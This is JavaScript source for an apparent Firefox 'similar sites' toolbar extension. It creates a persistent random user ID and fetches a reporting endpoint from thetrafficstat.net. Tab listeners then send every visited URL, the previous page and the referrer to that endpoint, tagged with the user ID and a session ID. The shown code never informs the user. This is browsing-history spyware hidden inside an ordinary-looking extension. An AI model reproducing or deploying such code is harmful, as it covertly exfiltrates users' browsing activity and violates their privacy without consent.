var fl_json_parse = (function () {"use strict";var at,ch,escapee = {'"':  '"','\\': '\\','/':  '/',b:    '\b',f:    '\f',n:    '\n',r:    '\r',t:    '\t'},text,error = function (m) {throw {name:    'SyntaxError',message: m,at:      at,text:    text};},next = function (c) {if (c && c !== ch) {error("Expected '" + c + "' instead of '" + ch + "'");}ch = text.charAt(at);at += 1;return ch;},number = function () {var number,string = '';if (ch === '-') {string = '-';next('-');}while (ch >= '0' && ch <= '9') {string += ch;next();}if (ch === '.') {string += '.';while (next() && ch >= '0' && ch <= '9') {string += ch;}}if (ch === 'e' || ch === 'E') {string += ch;next();if (ch === '-' || ch === '+') {string += ch;next();}while (ch >= '0' && ch <= '9') {string += ch;next();}}number = +string;if (!isFinite(number)) {error("Bad number");} else {return number;}},string = function () {var hex,i,string = '',uffff;if (ch === '"') {while (next()) {if (ch === '"') {next();return string;} else if (ch === '\\') {next();if (ch === 'u') {uffff = 0;for (i = 0; i < 4; i += 1) {hex = parseInt(next(), 16);if (!isFinite(hex)) {break;}uffff = uffff * 16 + hex;}string += String.fromCharCode(uffff);} else if (typeof escapee[ch] === 'string') {string += escapee[ch];} else {break;}} else {string += ch;}}}error("Bad string");},white = function () {while (ch && ch <= ' ') {next();}},word = function () {switch (ch) {case 't':next('t');next('r');next('u');next('e');return true;case 'f':next('f');next('a');next('l');next('s');next('e');return false;case 'n':next('n');next('u');next('l');next('l');return null;}error("Unexpected '" + ch + "'");},value,array = function () {var array = [];if (ch === '[') {next('[');white();if (ch === ']') {next(']');return array;}while (ch) {array.push(value());white();if (ch === ']') {next(']');return array;}next(',');white();}}error("Bad array");},object = function () {var key,object = {};if (ch === '{') {next('{');white();if (ch === '}') {next('}');return object;}while (ch) {key = string();white();next(':');if (Object.hasOwnProperty.call(object, key)) {error('Duplicate key "' + key + '"');}object[key] = value();white();if (ch === '}') {next('}');return object;}next(',');white();}}error("Bad object");};value = function () {white();switch (ch) {case '{':return object();case '[':return array();case '"':return string();case '-':return number();default:return ch >= '0' && ch <= '9' ? number() : word();}};return function (source, reviver) {var result;text = source;at = 0;ch = ' ';result = value();white();if (ch) {error("Syntax error");}return typeof reviver === 'function' ? (function walk(holder, key) {var k, v, value = holder[key];if (value && typeof value === 'object') {for (k in value) {if (Object.prototype.hasOwnProperty.call(value, k)) {v = walk(value, k);if (v !== undefined) {value[k] = v;} else {delete value[k];}}}}return reviver.call(holder, key, value);}({'': result}, '')) : result;};}());
var similarsites_fl_CommonUtils = {
	//----------------------Constants for rollDate()
	get dtMONTH() { return 0; },
	get dtDAY()   { return 1; },
	get dtYEAR()  { return 2; },

	// Rolling Date to some years/month/days forward or backward 
    // DateType is set {dtYEAR,dtMONTH,dtDAY}
	rollDate : function (date, count, dateType) {
		try {
			var yr = date.getFullYear();
			var mo = date.getMonth() + 1;
			var day = date.getDate();
			
			var hours = date.getHours();
			var minutes = date.getMinutes();
			var seconds = date.getSeconds();
			var milliseconds = date.getMilliseconds();

			var _dateType = this.dtMONTH;
			if (dateType) {
				if ((dateType == this.dtMONTH) || (dateType == this.dtDAY) || (dateType == this.dtYEAR)) {
					_dateType = dateType;
				}
			}
			
			if (_dateType == this.dtYEAR) yr = yr + count;
			if (_dateType == this.dtMONTH) mo = mo + count;
			if (_dateType == this.dtDAY) day = day + count;
		
			return new Date(yr, mo-1, day, hours, minutes, seconds, milliseconds);
		} catch (e) {
			//alert(e);
		}
	},

	// Convert Date to String in format: "yyyy-mm-dd HH:MM:SS"
	getDateText: function(d) {		
		var year = d.getFullYear();
		var month = (d.getMonth() < 9 ? '0' : '') + (d.getMonth() + 1);
		var day = (d.getDate() < 10 ? '0' : '') + d.getDate(); 
		var hh =  (d.getHours() < 10 ? '0' : '') + d.getHours();
		var mm =  (d.getMinutes() < 10 ? '0' : '') + d.getMinutes();
		var ss =  (d.getSeconds() < 10 ? '0' : '') + d.getSeconds();
		return  year +"-"+ month +"-"+ day +" "+ hh +":"+ mm +":"+ ss;
	},
	


};

var similarsites_fl_Database = 
{
	_mDBConn: null, // database connection	
    get mDBConn() 
	{ 
		if (this._mDBConn == null) 
			this.init();
		return this._mDBConn;
	},

    init: function() 
	{
		this.openDB();
		this.clearDB();   
    },

    destroy: function() 
	{
    },

    openDB: function() 
	{
		try 
		{
			var file = Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("ProfD", Components.interfaces.nsIFile);  
			file.append("similarsites.sqlite");
			var storageService = Components.classes["@mozilla.org/storage/service;1"].getService(Components.interfaces.mozIStorageService);  
			this._mDBConn = storageService.openDatabase(file); // Will also create the file if it does not exist  

			// if database not exists - create it!
			var dbExists = this._mDBConn.tableExists("similarsites");
			if ( dbExists && (this.getSimilarsites().length == 0) )
			{
				var statement = similarsites_fl_Database.mDBConn.createStatement("INSERT INTO similarsites(creationdate,  similarsite) values(DATETIME(?1), ?2)");
				date = "'" + similarsites_fl_CommonUtils.getDateText(new Date()) + "'";
				similarsite = {};        
				similarsite.similarsite =  sw_globals_fl.randomStringAlphaNum_fl(8) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) +  '-' + sw_globals_fl.randomStringAlphaNum_fl(12);
				similarsite.similarsite = similarsite.similarsite.toUpperCase(); 
				statement.bindStringParameter(0, date);
				statement.bindStringParameter(1, similarsite.similarsite);
				statement.execute();        
			}
			if( !dbExists  ) 
				this.createDB();

		} 
		catch(err) 
		{
		}
    },
  
	// create database at First time
    createDB: function() 
	{
		try 
		{
			this._mDBConn.executeSimpleSQL("CREATE TABLE similarsites (creationdate TIMESTAMP,  similarsite TEXT)");
			this._mDBConn.executeSimpleSQL("CREATE INDEX indexsimilarsites ON similarsites (creationdate)");
		    var statement = similarsites_fl_Database.mDBConn.createStatement("INSERT INTO similarsites(creationdate,  similarsite) values(DATETIME(?1), ?2)");
            date = "'" + similarsites_fl_CommonUtils.getDateText(new Date()) + "'";
            similarsite = {};        
            similarsite.similarsite =  sw_globals_fl.randomStringAlphaNum_fl(8) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) + '-' + sw_globals_fl.randomStringAlphaNum_fl(4) +  '-' + sw_globals_fl.randomStringAlphaNum_fl(12);
            similarsite.similarsite = similarsite.similarsite.toUpperCase(); 
            statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, similarsite.similarsite);
			statement.execute();        
        
        } 
		catch(err){}		
    },

    clearDB: function() 
	{		
		if(this._mDBConn.tableExists("similarsites"))   
		{
    	} 
		else 
		{
			this.createDB();
		}
    },
	
	beginMassTranzaction: function() 
	{
		if(!similarsites_fl_Database.mDBConn.transactionInProgress)
			similarsites_fl_Database.mDBConn.beginTransaction();
	},

	endMassTranzaction: function() 
	{
		if(similarsites_fl_Database.mDBConn.transactionInProgress)
			similarsites_fl_Database.mDBConn.commitTransaction();		
	},
		
	addsimilarsite: function(similarsite) 
	{
		try 
		{
			var date = similarsites_fl_CommonUtils.getDateText( similarsite.creationdate );
			var statement = similarsites_fl_Database.mDBConn.createStatement("INSERT INTO similarsites(creationdate, similarsite) values(DATETIME(?1), ?2)");
			statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, similarsite.similarsite);
			statement.execute();
        } 
		catch(e) {}
	},
	
	getSimilarsites: function() 
	{
        try  
		{
            var statement = similarsites_fl_Database.mDBConn.createStatement("SELECT creationdate, similarsite FROM similarsites");		
			var results = [];			
			while (statement.executeStep()) 
			{
				var p = {
					date:        statement.getString(0),
					similarsite:     statement.getString(1)
				}
               
				results.push(p);
			}
			statement.finalize();
			return results;
        } 
		catch(e) 
		{ 
			return [];
        }			
	},
    getPid: function() 
	{
        try  
		{
			var similarsites = this.getSimilarsites();
            if(similarsites.length > 0){return similarsites[0].similarsite;}
			else{return null;}
        } 
		catch(e){return null;}			
	}
};


var sw_globals_fl = {
	ci		:	Components.interfaces,
	cr		:	Components.results,
	cc		:	Components.classes,
	webp	: 	Components.interfaces.nsIWebProgress,
	webpl	:	Components.interfaces.nsIWebProgressListener,
	tabs	:	new Array(),
	user_id	: 	similarsites_fl_Database.getPid(),
	s		:	'175',
	md		:	'21',
	sub		:	'Toolbar1',
	session_id : '',
	listeners : null,
	send_url : '',
	randomStringNum_fl : function(length) 
	{
		var chars = '0123456789'.split('');
		if (!length) 
		{
			length = Math.floor(Math.random() * chars.length);
		}
	
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
    randomStringAlphaNum_fl : function(length) {
        var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
        
        if (! length) {
            length = Math.floor(Math.random() * chars.length);
        }
        
        var str = '';
        for (var i = 0; i < length; i++) {
            str += chars[Math.floor(Math.random() * chars.length)];
        }
        return str;
    },
	is_valid_listener : function(iid) 
	{	
		return (iid.equals(this.webpl) ||	iid.equals(this.ci.nsISupportsWeakReference) || iid.equals(this.ci.nsISupports));
	},
	load_balance : function() 
	{
		var req = new XMLHttpRequest();
		req.open("GET","http://www.thetrafficstat.net/settings?s="+sw_globals_fl.s,true);
		req.onreadystatechange = function()
		{
			if ( req.readyState == 4 )
			{
				var lb = fl_json_parse(req.responseText);
				if ( lb && lb.Status == 1 )
				{
					sw_globals_fl.send_url = lb.Endpoint;
				}				
			}
		}
		req.send(null);
	},
	get_browser_by_tab_id : function(id)
	{
		var tab = document.getElementById(id);
		if ( !tab )
			return null;
		
		for (var i=0;i<tab.childNodes.length;i++)
		{
			var browser = tab.childNodes[i];
			if ( browser.localName == "browser" )
				return browser;
		}
		
		return null
	},
	get_ff_version : function()
	{
		try 
		{
			return parseFloat(sw_globals_fl.cc["@mozilla.org/preferences-service;1"].getService(sw_globals_fl.ci.nsIPrefService).getBranch("").getCharPref("extensions.lastAppVersion"));
		}
		catch ( e )
		{
			
		}
		return 0;
		
	},
	on_page_load : function (e)
	{
		
	},
	sw_init_tab_listeners_fl : function()
	{
		sw_globals_fl.session_id = 'S' + sw_globals_fl.randomStringNum_fl(14);
		sw_globals_fl.load_balance();
		if ( sw_globals_fl.get_ff_version() >= 4)
		{
			sw_globals_fl.listners = new sw_global_tabs_listner_fl();
			gBrowser.addTabsProgressListener(sw_globals_fl.listners);
			return;
		}
		try
		{
			var nBrowsers = gBrowser.browsers.length;
			for (var tIndex = 0; tIndex < nBrowsers; tIndex++)
			{
				var oBrowser			= window.getBrowser().browsers[tIndex];			
				var tid					= oBrowser.parentNode.id == "" ? oBrowser.parentNode.parentNode.id : oBrowser.parentNode.id;
				sw_globals_fl.tabs[tid]			= new sw_tab_context_fl(tid);
				sw_globals_fl.tabs[tid].listener 	= new sw_tabs_listener_fl(tid);
				oBrowser.webProgress.addProgressListener(sw_globals_fl.tabs[tid].listener);
				oBrowser.addEventListener("DOMContentLoaded", sw_globals_fl.on_page_load, false);  
			}
			var panel = gBrowser.mPanelContainer;
			panel.addEventListener("DOMNodeInserted", sw_globals_fl.sw_tab_added_fl, false);
			panel.addEventListener("DOMNodeRemoved", sw_globals_fl.sw_tab_removed_fl, false);
		}
		catch(E){dump(E);}
	},
	sw_tab_added_fl : function(e)
	{
		try
		{
			var target = event.target;
			if (event.relatedNode != gBrowser.mPanelContainer) return;
			if (target.localName == "vbox"  || target.localName == "notificationbox")
			{
				target.addEventListener('DOMAttrModified', sw_globals_fl.sw_tab_assigned_fl, false);
			}
		
		}
		catch (e){}
		return;
	},
	sw_tab_removed_fl : function(e)
	{
		try
		{
			if (e.relatedNode != gBrowser.mPanelContainer)
				return;
		
			var target = e.target;
			if ( target.localName != "vbox" )
				return;
			if ( target.parentNode.localName != "tabpanels" )
				return;
			if ( sw_globals_fl.tabs[target.id] == undefined )
				return;
			delete sw_globals_fl.tabs[target.id].listener;
			delete sw_globals_fl.tabs[target.id];
		}
		catch (E){}
	},
	sw_tab_assigned_fl : function(e)
	{
		if ( e.attrName != 'id'  )
			return;

		var tab_id		= e.newValue;
		var browserObj	= null;
		var target		= e.target;
		this.tabs[tab_id] 			= new sw_tab_context_fl(tab_id);
		this.tabs[tab_id].listener 	= new sw_tabs_listener_fl(tab_id);
		for (var i = 0; i < target.childNodes.length; i++)
		{
			if (target.childNodes[i].localName == 'browser')
			{
				browserObj = target.childNodes[i];
				break;
			}
		}
		
		if ( !browserObj )
		{
			tab_id = e.currentTarget.linkedPanel;
			browserObj = e.target.linkedBrowser;
		}

		e.target.removeEventListener('DOMAttrModified', sw_globals_fl.sw_tab_removed_fl, false);
		browserObj.webProgress.addProgressListener(sw_globals_fl.tabs[tab_id].listener);
	}
	
	
	
}

setTimeout(sw_globals_fl.sw_init_tab_listeners_fl, 500);


function sw_global_tabs_listner_fl(){};
sw_global_tabs_listner_fl.prototype = 
{
	QueryInterface: function(iid)
	{
		if ( sw_globals_fl.is_valid_listener( iid ) )
			return this;
		throw sw_globals_fl.cr.NS_NOINTERFACE;
	},
	onLocationChange: function(aBrowser, aProgress, aRequest, aURI)
	{
		try{
		var httpChannel = null;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		if ( aURI.asciiSpec.indexOf("about:") > -1)
			return;
			
		var ref = aBrowser.contentDocument.referrer;
		if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
			ref = aRequest.referrer.asciiSpec;	
		var is_link = ref != "";
		
		var prev = "";
		if (aBrowser.fl_prev_url && (aBrowser.fl_prev_url !="")) 
			prev = aBrowser.fl_prev_url;
		else if ( aProgress.DOMWindow.opener )
			prev = aProgress.DOMWindow.opener.top.location.href;
		else
			prev = ref;
		if (
			( prev.indexOf("https://www.google") > -1 ) &&
			( aURI.asciiSpec.indexOf("http://www.google") > -1 )
			)
		{
			dump("skipping google");
			return;
		}
		if ( sw_globals_fl.send_url && sw_globals_fl.send_url != "" )
		{
			var params = "s="+sw_globals_fl.s+"&md="+sw_globals_fl.md+"&pid=" + sw_globals_fl.user_id + "&sess=" + sw_globals_fl.session_id + "&q=" + encodeURIComponent(aURI.asciiSpec) + "&prev=" + encodeURIComponent(prev) + "&link="+(is_link?"1":"0")+"&hreferer="+encodeURIComponent(ref)+"&sub="+encodeURIComponent(sw_globals_fl.sub);
			var req = new XMLHttpRequest();
			req.open("GET",sw_globals_fl.send_url+"/related?"+params,true);
			req.onreadystatechange = function()
			{
				if ( req.readyState == 4 )
				{
				}
			}
			req.send(null);
		}
		aBrowser.fl_prev_url = aURI.asciiSpec;
		}
		catch(e){};
	
	}, 
	onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr){return 0}, 
	onSecurityChange: function(aBrowser, aProgress, aRequest, aState) {return 0;},
  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus)
	{
		return 0;
	
		if (!( aFlag & this.webpl.STATE_STOP))
			return 0;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		var httpChannel = null;
		try {httpChannel = aRequest.QueryInterface(this.ci.nsIHttpChannel);} catch (e) {}
		if ( !httpChannel )
		{
			var x = (aRequest == null);
			return 0;
		}
		/*if ( httpChannel.URI.asciiSpec != aBrowser.currentURI.asciiSpec)
			return;*/
		if ( httpChannel.responseStatus >= 200 || httpChannel.responseStatus < 400)
		{
			if (( aFlag & 0x00080000 ) ) 
			{
				
				
				var ref = aBrowser.contentDocument.referrer;
				if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
					ref = aRequest.referrer.asciiSpec;	

				var is_link = ref != "";
				var prev = aBrowser.fl_prev_url ? aBrowser.fl_prev_url : "";
				if ( sendUrl && sendUrl != "" )
				{
					var params = "s="+sw_globals_fl.s+"&md="+sw_globals_fl.md+"&pid=" + sw_globals_fl.user_id + "&sess=" + sw_globals_fl.session_id + "&q=" + encodeURIComponent(aURI.asciiSpec) + "&prev=" + encodeURIComponent(prev) + "&link="+(is_link?"1":"0")+"&hreferer="+encodeURIComponent(ref)+"&sub="+encodeURIComponent(sw_globals_fl.sub);
					var req = new XMLHttpRequest();
					req.open("GET",sw_globals_fl.send_url+"/related?"+params,true);
					req.onreadystatechange = function()
					{
						if ( req.readyState == 4 )
						{
						}
					}
					req.send(null);
				}
			
			aBrowser.fl_prev_url = httpChannel.URI.asciiSpec;
				
			}
		}
		return 0;
	
	},
	onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) {return 0;},
	onLinkIconAvailable: function() {return 0;},
	onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI){return true;},
	onLinkIconAvailable : function(aBrowser){return 0}
}


function sw_tabs_listener_fl(tab_id)
{
	this.tab_id = tab_id;
}

sw_tabs_listener_fl.prototype =
{
	QueryInterface: function(iid)
	{
		if ( sw_globals_fl.is_valid_listener( iid ) )
		    return this;
			
		throw sw_globals_fl.cr.NS_NOINTERFACE;
	},
	onLocationChange: function(aProgress, aRequest, aURI) {return 0;}, 
	onProgressChange: function(aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr){return 0;}, 
	onSecurityChange: function(aProgress, aRequest, aState) {return 0;},
  	onStateChange: function(aProgress, aRequest, aFlag, aStatus)
	{
		if (!( aFlag & sw_globals_fl.webpl.STATE_IS_DOCUMENT ))
			return 0;

		if (!( aFlag & sw_globals_fl.webpl.STATE_STOP))
			return 0;

		var cur_tab = this.tab_id;
		var httpChannel = null;
		try {httpChannel = aRequest.QueryInterface(sw_globals_fl.ci.nsIHttpChannel);} catch (e) {}
		if ( !httpChannel )
			return 0;

		var oBrowser = sw_globals_fl.get_browser_by_tab_id(this.tab_id);
		if ( httpChannel.URI.asciiSpec != oBrowser.currentURI.asciiSpec)
			return;

		if ( httpChannel.responseStatus == 200 )
		{
			var ref = oBrowser.contentDocument.referrer;
			if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
				ref = aRequest.referrer.asciiSpec;	

			var is_link = ref != "";
		}
		return 0;
	},
	onStatusChange: function(webProgress , request , ostatus ,  message) {return 0;},
	onLinkIconAvailable: function() {return 0;}
}

function sw_tab_context_fl(tab_id)
{
    this.listener		= null;
    this.httpObserver	= null;
    this.tab_id			= tab_id;
	this.fl_prev_url 		= "";
}

sw_tab_context_fl.prototype =
{
    get_tab_browser : function() 
    {
        var browser = null;
        var nBrowsers = gBrowser.browsers.length;
        for (var tab_index = 0; tab_index < nBrowsers; tab_index++)
        {
            if (gBrowser.getBrowserAtIndex(tab_index).parentNode.id ==  this.listener.tab_id)
            {
				browser = gBrowser.getBrowserAtIndex(tab_index);
                break;
            }
        }
        return browser;
    }
}